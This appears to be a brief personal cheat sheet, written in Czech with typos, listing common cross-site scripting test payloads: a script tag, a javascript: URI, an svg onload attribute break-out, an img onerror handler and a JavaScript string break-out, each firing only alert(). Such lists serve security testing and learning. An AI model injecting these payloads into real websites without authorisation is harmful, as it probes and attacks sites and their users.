klasika
<script>alert(1)</script>inside href attrubutu
javascript:alert()taky velmi častý - escape, pak svg, svg s loadem spustí skript "" už v dnešní době neni nutný ve většině prohlížečů btw
"><svg onload=alert(1)>img onerror taky skvělý
<img src=1 onerror=alert(1)>break out z js stringu
';alert();//